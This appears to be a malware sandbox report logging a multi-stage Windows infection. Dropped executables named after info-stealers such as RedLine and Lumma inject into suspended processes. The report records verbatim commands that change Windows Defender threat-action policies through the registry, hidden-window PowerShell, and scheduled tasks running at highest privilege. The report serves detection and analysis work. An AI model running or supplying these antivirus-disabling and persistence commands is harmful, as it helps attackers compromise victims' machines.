--initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef43bf1e8,0x7fef43bf1f8,0x7fef43bf208c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exec:\users\test22\appdata\local\temp\1000035001\gold.exe"c:\users\test22\appdata\local\temp\12.exe" c:\users\test22\appdata\local\temp\1000304001\b2c2c1.exec:\users\test22\appdata\local\temp\1000064001\newkindr.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" c:\users\test22\appdata\local\temp\1000063001\drivermanager.exe"c:\program files (x86)\google\chrome\application\chrome.exe" https://www.youtube.com/account"c:\users\test22\appdata\local\temp\1000016001\a2772ea559.exe" /c reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147735503 /t reg_sz /d 6forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"c:\users\test22\appdata\local\temp\9217037dc9\explortu.exeschtasks /create /f /ru "test22" /tr "c:\programdata\mpgph131\mpgph131.exe" /tn "mpgph131 hr" /sc hourly /rl highest/c reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147812831 /t reg_sz /d 6c:\users\test22\appdata\local\temp\1000025001\setup222.exe.\install.exe /fwdiduckaz "385134" /sc:\users\test22\appdata\local\temp\1000007001\redline123123.exec:\users\test22\appdata\local\temp\1000307001\setup.exe"c:\users\test22\appdata\local\temp\1000008001\upd.exe" c:\users\test22\1000015002\d7e4153d35.exereg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147814524 /t reg_sz /d 6chrome.exe https://www.youtube.com/account"c:\users\test22\appdata\local\temp\1000005001\judit.exe" "c:\users\test22\appdata\local\temp\1000007001\redline123123.exe" c:\users\test22\appdata\local\temp\1000306001\firstz.execmd /c forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"schtasks /create /f /ru "test22" /tr "c:\programdata\mpgph131\mpgph131.exe" /tn "mpgph131 lg" /sc onlogon /rl highestforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" "c:\users\test22\appdata\local\temp\1000047001\lummac2.exe" reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147780199 /t reg_sz /d 6c:\users\test22\appdata\local\temp\1000017001\db324166b9.exe"c:\windows\system32\schtasks.exe" /create /sc minute /mo 1 /tn newkindr.exe /tr "c:\users\test22\appdata\local\temp\1000064001\newkindr.exe" /fc:\users\test22\appdata\local\temp\8254624243\axplong.exe/c powershell start-process -windowstyle hidden gpupdate.exe /forcec:\users\test22\appdata\local\temp\12.exereg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147812831 /t reg_sz /d 6c:\users\test22\appdata\local\temp\1000008001\upd.exec:\users\test22\appdata\local\temp\1000047001\lummac2.exe"c:\users\test22\1000015002\d7e4153d35.exe" "c:\users\test22\appdata\local\temp\1000035001\gold.exe" "c:\users\test22\appdata\local\temp\1000068001\servoces64.exe" c:\users\test22\appdata\local\temp\1000005001\judit.exereg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147735503 /t reg_sz /d 6"c:\users\test22\appdata\local\temp\1000025001\setup222.exe" "c:\users\test22\appdata\local\temp\1000063001\drivermanager.exe" "c:\users\test22\appdata\local\temp\1000307001\setup.exe" "c:\windows\system32\gpupdate.exe" /force "c:\users\test22\appdata\local\temp\1000306001\firstz.exe" c:\windows\system32\gpupdate.exe /force c:\users\test22\appdata\local\temp\1000016001\a2772ea559.exe/c reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147780199 /t reg_sz /d 6"c:\users\test22\appdata\local\temp\1000060001\onecommander.exe" /c reg add "hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction" /f /v 2147814524 /t reg_sz /d 6"c:\users\test22\appdata\local\temp\8254624243\axplong.exe" "c:\users\test22\appdata\local\temp\1000304001\b2c2c1.exe" c:\users\test22\appdata\local\temp\1000060001\onecommander.exe.\install.exec:\users\test22\appdata\local\temp\1000068001\servoces64.exe
parent_process powershell.exe martian_process C:\Windows\System32\gpupdate.exe /force
parent_process powershell.exe martian_process "C:\Windows\system32\gpupdate.exe" /force
parent_process chrome.exe martian_process "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2644 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process chrome.exe martian_process "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef43bf1e8,0x7fef43bf1f8,0x7fef43bf208
parent_process chrome.exe martian_process "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1172,10468024286496660474,8520136674761711401,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=CB321EDECF782D156857DF85BE4265F2 --mojo-platform-channel-handle=1188 --ignored=" --type=renderer " /prefetch:2
Process injection Process 2380 resumed a thread in remote process 2808
Process injection Process 3176 resumed a thread in remote process 3232
Process injection Process 3912 resumed a thread in remote process 4020
Process injection Process 1868 resumed a thread in remote process 2288
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000029c
suspend_count: 1
process_identifier: 2808
1 0 0

NtResumeThread

thread_handle: 0x00000244
suspend_count: 1
process_identifier: 3232
1 0 0

NtResumeThread

thread_handle: 0x00000360
suspend_count: 1
process_identifier: 4020
1 0 0

NtResumeThread

thread_handle: 0x00000244
suspend_count: 1
process_identifier: 2288
1 0 0
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Time & API Arguments Status Return Repeated

WNetGetProviderNameW

net_type: 0x00250000
1222 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed 64 8f 05 00 00 00 00 52 83 ec 04 89 24 24 81
exception.symbol: amadka+0x1fc852
exception.instruction: in eax, dx
exception.module: amadka.exe
exception.exception_code: 0xc0000096
exception.offset: 2082898
exception.address: 0x107c852
registers.esp: 2226220
registers.edi: 4075032
registers.eax: 1447909480
registers.ebp: 4005662740
registers.edx: 22104
registers.ebx: 1969033397
registers.esi: 17273430
registers.ecx: 20
1 0 0
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\2147735503
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\2147814524
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\2147812831
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\2147780199
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000001ec
suspend_count: 1
process_identifier: 2548
1 0 0

CreateProcessInternalW

thread_identifier: 2832
thread_handle: 0x000003d4
process_identifier: 2828
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\9217037dc9\explortu.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\9217037dc9\explortu.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\9217037dc9\explortu.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003dc
1 1 0

NtResumeThread

thread_handle: 0x000001a0
suspend_count: 1
process_identifier: 2828
1 0 0

CreateProcessInternalW

thread_identifier: 3020
thread_handle: 0x0000037c
process_identifier: 3016
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\9217037dc9\explortu.exe
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Local\Temp\9217037dc9\explortu.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000380
1 1 0

NtGetContextThread

thread_handle: 0x0000037c
1 0 0

NtAllocateVirtualMemory

process_identifier: 3016
region_size: 5447680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000380
3221225496 0

CreateProcessInternalW

thread_identifier: 604
thread_handle: 0x0000047c
process_identifier: 1120
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\1000015002\d7e4153d35.exe
track: 1
command_line: "C:\Users\test22\1000015002\d7e4153d35.exe"
filepath_r: C:\Users\test22\1000015002\d7e4153d35.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000480
1 1 0

CreateProcessInternalW

thread_identifier: 2272
thread_handle: 0x00000458
process_identifier: 2268
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\1000016001\a2772ea559.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000016001\a2772ea559.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000016001\a2772ea559.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000488
1 1 0

CreateProcessInternalW

thread_identifier: 2764
thread_handle: 0x000003b4
process_identifier: 2380
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\1000017001\db324166b9.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000017001\db324166b9.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000017001\db324166b9.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000048c
1 1 0

NtResumeThread

thread_handle: 0x000001e8
suspend_count: 1
process_identifier: 1120
1 0 0

CreateProcessInternalW

thread_identifier: 2256
thread_handle: 0x000003dc
process_identifier: 2232
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\8254624243\axplong.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\8254624243\axplong.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\8254624243\axplong.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003e4
1 1 0

NtResumeThread

thread_handle: 0x000001a0
suspend_count: 1
process_identifier: 2232
1 0 0

CreateProcessInternalW

thread_identifier: 416
thread_handle: 0x0000046c
process_identifier: 776
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\1000005001\judit.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000005001\judit.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000005001\judit.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000464
1 1 0

CreateProcessInternalW

thread_identifier: 1576
thread_handle: 0x00000434
process_identifier: 1528
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\1000007001\redline123123.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000007001\redline123123.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000007001\redline123123.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000474
1 1 0

CreateProcessInternalW

thread_identifier: 2776
thread_handle: 0x0000034c
process_identifier: 2780
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\1000008001\upd.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000008001\upd.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000008001\upd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000468
1 1 0

CreateProcessInternalW

thread_identifier: 2304
thread_handle: 0x00000440
process_identifier: 800
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\1000025001\setup222.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000025001\setup222.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000025001\setup222.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000478
1 1 0

CreateProcessInternalW

thread_identifier: 2112
thread_handle: 0x0000037c
process_identifier: 2108
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\1000035001\gold.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000035001\gold.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000035001\gold.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000488
1 1 0

CreateProcessInternalW

thread_identifier: 2440
thread_handle: 0x0000047c
process_identifier: 740
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\1000047001\lummac2.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000047001\lummac2.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000047001\lummac2.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000488
1 1 0

CreateProcessInternalW

thread_identifier: 2296
thread_handle: 0x00000470
process_identifier: 2300
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\1000060001\onecommander.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000060001\onecommander.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000060001\onecommander.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000037c
1 1 0

CreateProcessInternalW

thread_identifier: 3180
thread_handle: 0x0000046c
process_identifier: 3176
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\1000063001\drivermanager.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000063001\drivermanager.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000063001\drivermanager.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000037c
1 1 0

CreateProcessInternalW

thread_identifier: 3484
thread_handle: 0x00000468
process_identifier: 3480
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000049c
1 1 0

CreateProcessInternalW

thread_identifier: 3988
thread_handle: 0x0000047c
process_identifier: 3984
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\1000068001\servoces64.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000068001\servoces64.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000068001\servoces64.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000004a0
1 1 0

NtResumeThread

thread_handle: 0x0000014c
suspend_count: 1
process_identifier: 2268
1 0 0

CreateProcessInternalW

thread_identifier: 2708
thread_handle: 0x0000015c
process_identifier: 2704
current_directory:
filepath:
track: 1
command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000160
1 1 0

CreateProcessInternalW

thread_identifier: 2072
thread_handle: 0x00000168
process_identifier: 1152
current_directory:
filepath:
track: 1
command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000164
1 1 0

NtResumeThread

thread_handle: 0x000001e0
suspend_count: 1
process_identifier: 2268
1 0 0

NtResumeThread

thread_handle: 0x00000278
suspend_count: 1
process_identifier: 2380
1 0 0

CreateProcessInternalW

thread_identifier: 2644
thread_handle: 0x0000029c
process_identifier: 2808
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
track: 1
command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002a4
1 1 0

NtResumeThread

thread_handle: 0x0000029c
suspend_count: 1
process_identifier: 2808
1 0 0

CreateProcessInternalW

thread_identifier: 3012
thread_handle: 0x0000000000000098
process_identifier: 2752
current_directory:
filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
track: 1
command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef43bf1e8,0x7fef43bf1f8,0x7fef43bf208
filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x000000000000009c
1 1 0

CreateProcessInternalW

thread_identifier: 2124
thread_handle: 0x0000000000000144
process_identifier: 2120
current_directory:
filepath:
track: 1
command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2644 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
filepath_r:
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000148
1 1 0

NtResumeThread

thread_handle: 0x00000000000001c0
suspend_count: 1
process_identifier: 2808
1 0 0

CreateProcessInternalW

thread_identifier: 1668
thread_handle: 0x000000000000060c
process_identifier: 1108
current_directory:
filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
track: 1
command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1172,10468024286496660474,8520136674761711401,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=CB321EDECF782D156857DF85BE4265F2 --mojo-platform-channel-handle=1188 --ignored=" --type=renderer " /prefetch:2
filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
stack_pivoted: 0
creation_flags: 17302540 (CREATE_BREAKAWAY_FROM_JOB|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|DETACHED_PROCESS|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000000000005e4
1 1 0

NtResumeThread

thread_handle: 0x00000000000000dc
suspend_count: 1
process_identifier: 2752
1 0 0

NtGetContextThread

thread_handle: 0x0000000000000154
1 0 0

CreateProcessInternalW

thread_identifier: 2684
thread_handle: 0x0000000000000084
process_identifier: 2688
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\stub.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000005001\judit.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\stub.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000000000000088
1 1 0

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 1528
1 0 0

NtResumeThread

thread_handle: 0x0000014c
suspend_count: 1
process_identifier: 1528
1 0 0

NtResumeThread

thread_handle: 0x0000018c
suspend_count: 1
process_identifier: 1528
1 0 0

NtResumeThread

thread_handle: 0x000002fc
suspend_count: 1
process_identifier: 1528
1 0 0

NtResumeThread

thread_handle: 0x00000334
suspend_count: 1
process_identifier: 1528
1 0 0

NtResumeThread

thread_handle: 0x000003b0
suspend_count: 1
process_identifier: 1528
1 0 0

NtResumeThread

thread_handle: 0x000004d4
suspend_count: 1
process_identifier: 1528
1 0 0

NtGetContextThread

thread_handle: 0x000000e0
1 0 0

NtGetContextThread

thread_handle: 0x000000e0
1 0 0

NtResumeThread

thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 1528
1 0 0

NtGetContextThread

thread_handle: 0x000000e0
1 0 0

NtGetContextThread

thread_handle: 0x000000e0
1 0 0

NtResumeThread

thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 1528
1 0 0

NtGetContextThread

thread_handle: 0x000000e0
1 0 0